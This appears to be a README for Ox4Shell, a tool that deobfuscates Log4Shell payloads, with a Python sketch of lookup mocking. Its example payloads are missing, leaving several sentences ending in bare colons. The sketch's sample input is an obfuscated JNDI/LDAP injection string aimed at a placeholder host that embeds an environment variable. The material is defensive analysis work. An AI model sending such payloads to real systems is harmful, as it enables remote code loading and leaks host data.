
Ox4Shell – Deobfuscate Log4Shell Payloads With Ease

Deobfuscate Log4Shell payloads with ease.

This tool intends to unravel the true contents of obfuscated Log4Shell payloads.

For example, consider the following obfuscated payload:

After running Ox4Shell, it would transform into an intuitive and readable form:

After running Ox4Shell, the tool reveals the attacker’s intentions:

To run the tool simply:

Ox4Shell uses the mock.json file to insert common values into certain lookup functions. For example, if the payload contains the value ${env:HOME}, we can replace it with a custom mock value.
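A minimal sketch of the mocking idea, as an added example that is not Ox4Shell's own code: it resolves Log4j lookups from the innermost outwards, answers `env`/`sys` lookups from a mock table, and leaves anything it cannot resolve (such as the final `jndi` lookup) intact for the analyst. The `MOCK` layout, its values, the function names and the sample payload are assumptions constructed for this illustration.

```python
import re

# Constructed mock values for this example; not Ox4Shell's default mock.json.
MOCK = {
    "env": {"HOME": "/home/mock-user", "USER": "mock-user"},
    "sys": {"java.version": "1.8.0_mock"},
}

# Innermost lookup: "${" ... "}" with no nested "${" and no "}" inside.
INNERMOST = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")
OPEN, CLOSE = "\x01", "\x02"  # stand-ins that park lookups we leave unresolved


def resolve(body, mock):
    """Return the text a lookup body would expand to, or None if unknown."""
    name, has_default, default = body.partition(":-")  # ${name:-default}
    prefix, _, key = name.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if key in mock.get(prefix, {}):  # e.g. ${env:HOME} answered from the mock
        return mock[prefix][key]
    if has_default:  # e.g. ${::-j} has no resolvable name, so the default wins
        return default
    return None  # jndi and other unknown lookups are never evaluated here


def deobfuscate(payload, mock=MOCK, max_rounds=50):
    """Expand lookups innermost-first until nothing resolvable is left."""
    for _ in range(max_rounds):  # bounded, so crafted input cannot loop forever
        def substitute(match):
            value = resolve(match.group(1), mock)
            if value is None:  # park it so the regex does not match it again
                return OPEN + match.group(1) + CLOSE
            return value
        payload, count = INNERMOST.subn(substitute, payload)
        if count == 0:
            break
    return payload.replace(OPEN, "${").replace(CLOSE, "}")


if __name__ == "__main__":
    # Constructed sample payload pointing at a reserved test hostname.
    sample = "${${::-j}${lower:N}${::-d}i:ldap://example.test:1389/${env:USER}}"
    print(deobfuscate(sample))
```

Nothing is fetched or executed: the `jndi` lookup is only rewritten as text, which is what makes this safe to run over captured log lines.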

The default set of mock data provided is:

As an example, we can deobfuscate the following payload using Ox4Shell’s mocking capability:

The source code for the project is licensed under the MIT license, which you can find in the LICENSE file.

